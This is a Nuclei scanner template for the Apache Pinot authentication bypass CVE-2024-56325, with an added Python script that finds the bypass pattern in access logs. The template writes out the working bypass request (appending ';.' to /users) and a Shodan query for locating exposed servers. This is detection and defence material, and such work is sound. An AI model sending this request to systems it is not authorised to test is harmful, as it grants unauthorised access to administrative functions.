forked from projectdiscovery/nuclei-templates
CVE-2024-56325.yaml
id: CVE-2024-56325

info:
  name: Apache Pinot < 1.3.0 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
  impact: |
    Unauthenticated attackers can bypass authentication by injecting special characters in URIs, gaining unauthorized access to Apache Pinot administrative functions.
  remediation: |
    Update Apache Pinot to version 1.3.0 or later to address the authentication bypass vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-109/
    - https://github.com/advisories/GHSA-6jwp-4wvj-6597
    - https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
    - http://www.openwall.com/lists/oss-security/2025/03/27/8
  classification:
    cve-id: CVE-2024-56325
    cwe-id: CWE-288
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.30273
    epss-percentile: 0.96597
    cpe: cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:1696974531
  tags: cve,cve2024,apache,pinot,auth-bypass,vuln

http:
  - raw:
      - |
        GET /users HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  - raw:
      - |
        GET /users;. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"users"'

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'Pinot-Controller-'
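
A defender-side companion to the two requests in the template, added here as an example (not part of the template or of Apache Pinot): it scans access-log lines for a client that was denied on a path and then received a 200 on a `;`-decorated form of the same path. The simplified log format, `SAMPLE_LOG` and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in an assumed format: client "METHOD target HTTP/x" status
SAMPLE_LOG = """\
10.0.0.5 "GET /users HTTP/1.1" 401
10.0.0.5 "GET /users;. HTTP/1.1" 200
10.0.0.7 "GET /health HTTP/1.1" 200
10.0.0.8 "GET /tables;x=1 HTTP/1.1" 403
10.0.0.9 "GET /users HTTP/1.1" 403
10.0.0.9 "GET /users HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(\S+) "([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})$')


def strip_path_params(target):
    """Drop the query string and any ';...' parameter from each path segment."""
    path = target.split("?", 1)[0]
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def find_bypass_candidates(log_text):
    """Return sorted (client, bare_path, variants) tuples where the bare path was
    denied (401/403) and a ';'-decorated form of it returned 200 to the same client."""
    denied = set()                      # (client, bare_path) pairs that saw 401/403
    allowed_variant = defaultdict(set)  # (client, bare_path) -> decorated paths with 200
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        client, _method, target, status = m.groups()
        path = target.split("?", 1)[0]
        bare = strip_path_params(target)
        if path == bare and status in ("401", "403"):
            denied.add((client, bare))
        elif path != bare and status == "200":
            allowed_variant[(client, bare)].add(path)
    # Both sets are complete before correlation, so line order does not matter.
    return sorted(
        (client, bare, sorted(variants))
        for (client, bare), variants in allowed_variant.items()
        if (client, bare) in denied
    )


if __name__ == "__main__":
    for hit in find_bypass_candidates(SAMPLE_LOG):
        print(hit)
```

A hit is a lead for triage rather than proof of compromise; the upgrade to 1.3.0 or later named in the template's remediation field remains the fix.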